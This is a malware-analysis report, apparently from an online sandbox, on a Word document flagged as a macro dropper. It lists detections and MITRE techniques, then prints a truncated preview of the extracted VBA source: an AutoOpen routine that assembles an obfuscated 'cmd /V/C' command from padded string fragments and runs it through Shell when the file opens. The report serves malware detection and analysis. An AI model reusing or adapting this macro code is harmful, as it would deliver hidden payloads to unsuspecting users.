MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell function with obfuscated string concatenation to construct and execute a command. The specific command constructed is too obfuscated to fully determine, but the pattern suggests it is intended to download and execute a secondary payload.
Heuristics 5
-
ClamAV: Doc.Dropper.Valyria-6667198-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6667198-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12918 bytes |
SHA-256: 31bd437632e300f3159c40e6dcf4b41958c383ede1fc21364dc000e9893c8ccb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MlTiwrSuYj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName 431593219
TypeName 3371
TypeName Log(LjUKHK * IowScc)
TypeName CDate(ROlJA)
TypeName 180632239
TypeName HQraiT
Shell@ KeyString(vbKeyC) + vIzGYhQsjPOMu + GScqjBiicz + wBWcHoTV + dizMwSmi + iwnMY + BJCnAAc + jsNiwSL + ZJFiXIB + uOqANTjRNW + IbCWfu + DIkun + NUfXzQFQD + wcNidMJAtfpNd + dVuaUiEL, 903832498 - 903832498
TypeName 65
TypeName Tan(679)
End Sub
Attribute VB_Name = "bBMPYHmfVjhsE"
Function wBWcHoTV()
On Error Resume Next
TypeName Tan(4)
TypeName Sgn(mbYKdz)
TypeName 334838176
zqqAbSkTIz = "m" + "d" + " /V" + "/C" + CStr(Chr(zvrUiGHkjjQ + zQjZiGtoJjzuT + 34 + zwizXnJAa + bTJvhRYoJ)) + "se" + "t" + " , " + " " + " =" + "IA" + "J" + "YAU"
TypeName Round(922)
TypeName 948
TypeName CStr(90754 / HkVHb)
bUwrWrPpiEH = "oD" + "f" + "rM" + "n" + "Y" + "i" + "AN" + "Ww" + "nXT" + "d"
TypeName 3931
TypeName khblR
TypeName ChrB(wVaWfS)
XOMSmk = "k" + "To" + "wMv" + "A" + "jww" + "p" + "CR" + "E/;" + ":b" + "," + "scS" + "Z" + "a"
TypeName Tan(YjRpo)
TypeName 6948
TypeName Sqr(FzzGt)
PaFsb = "t" + "} " + "5" + "=" + "y." + "(2)" + "Gh" + "\x"
TypeName OEzmtj
TypeName CBool(6189)
VkjfT = "l" + "-'@" + "{m" + "e+3" + "qQ" + "u" + "0" + "P" + "$g" + "F"
wBWcHoTV = zqqAbSkTIz + bUwrWrPpiEH + XOMSmk + PaFsb + VkjfT
TypeName CStr(79)
TypeName Oct(YiotX - Ykalu)
TypeName 12
End Function
Function dizMwSmi()
On Error Resume Next
TypeName Cos(LzimEd)
TypeName Atn(EmwUJs)
TypeName 99
FvftBc = "&" + "&fo" + "r %" + "j i" + "n " + "(32" + ";" + "2" + "4;" + "31;"
TypeName CInt(qVfXLG)
TypeName 23
TypeName 9
RQznKODmO = "66" + ";9;" + "4" + "1;5" + "7;" + "6" + "6;" + "60" + ";60" + ";" + "4"
TypeName 393354982
TypeName CInt(37674 / 23023)
TypeName 2
qijmY = "8;7" + "4" + ";44" + ";76" + ";1" + "6;" + "5"
TypeName CLng(982)
TypeName Round(jYnUPb - kGZfPs)
hYcmOaU = "0;" + "1" + "8;" + "66;" + "31;" + "61;" + "24;" + "39"
TypeName CaDnmb
TypeName Rnd(8082)
ErCqMSzYo = ";" + "2" + "9" + ";" + "66;" + "4" + "2" + ";46"
dizMwSmi = FvftBc + RQznKODmO + qijmY + hYcmOaU + ErCqMSzYo
TypeName zEkauQ
TypeName hiLVF
End Function
Function iwnMY()
On Error Resume Next
TypeName Sin(zINDCq / 29363 + JcAuz / UcKPd)
TypeName Log(5964)
HdHRBzsnNYj = ";48" + ";" + "15;" + "66" + ";4" + "6;" + "52"
TypeName Poibwk
TypeName CStr(453225053)
fMqBAW = ";1" + "6" + ";6" + "6" + ";3" + "9;" + "3" + "3;6" + "0;1" + "3;" + "6" + "6;1"
TypeName LcvzGz
TypeName ChrB(NRRPhM)
jShkkPOFMIZ = "8;" + "46" + ";37" + ";" + "7" + "4;2" + "3;7" + "1;3"
TypeName Rnd(67910 / 21655 / 79903 * JaUdwP)
TypeName Oct(2)
TypeName SmcHB
aArTimzEKAm = "2;" + "50" + ";6" + "2" + ";57" + ";4" + "6;" + "46;"
TypeName ChrB(iESWp)
TypeName ChrB(27818 / zHWBi + 2502 - fYplI)
HNqdUdbzU = "32;" + "38;" + "36;" + "36;" + "41;" + "32"
TypeName CLng(9122)
TypeName 382
TypeName Rnd(rWaoJO / buoEGW + UmFPw - 16236)
zTXlIpZQ = ";66" + ";4" + "2;" + "46;" + "9;" + "7" + "1"
iwnMY = HdHRBzsnNYj + fMqBAW + jShkkPOFMIZ + aArTimzEKAm + HNqdUdbzU + zTXlIpZQ
TypeName 8050
TypeName CDate(bdEzX)
End Function
Function BJCnAAc()
On Error Resume Next
TypeName pfSNZ
TypeName CByte(UuGtwO)
PfzwRwAc = ";6" + "5" + ";3" + "9;2" + "4" + ";24" + ";" + "2" + "2" + ";41"
TypeName CLng(wCCAi / cnohil * bWhZth + CZfLO)
TypeName Int(517929031)
cLFmjhZsz = ";6" + "0;" + "13" + ";" + "65;" + "13" + ";" + "4"
TypeName CInt(psSIjA / EffJD)
TypeName 1
GEnqTcz = "6;6" + "6;2" + "1" + ";" + "5" + "2;4" + "2" + ";24" + ";65" + ";3" + "6"
TypeName Sin(zmTjM)
TypeName Log(bwTYW - 82982 - 73409 - dUzzoP)
TypeName Log(97852 - BduOYV / 44399 * 2369)
jJTVYTL = ";9;" + "1" + "6;" + "6
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.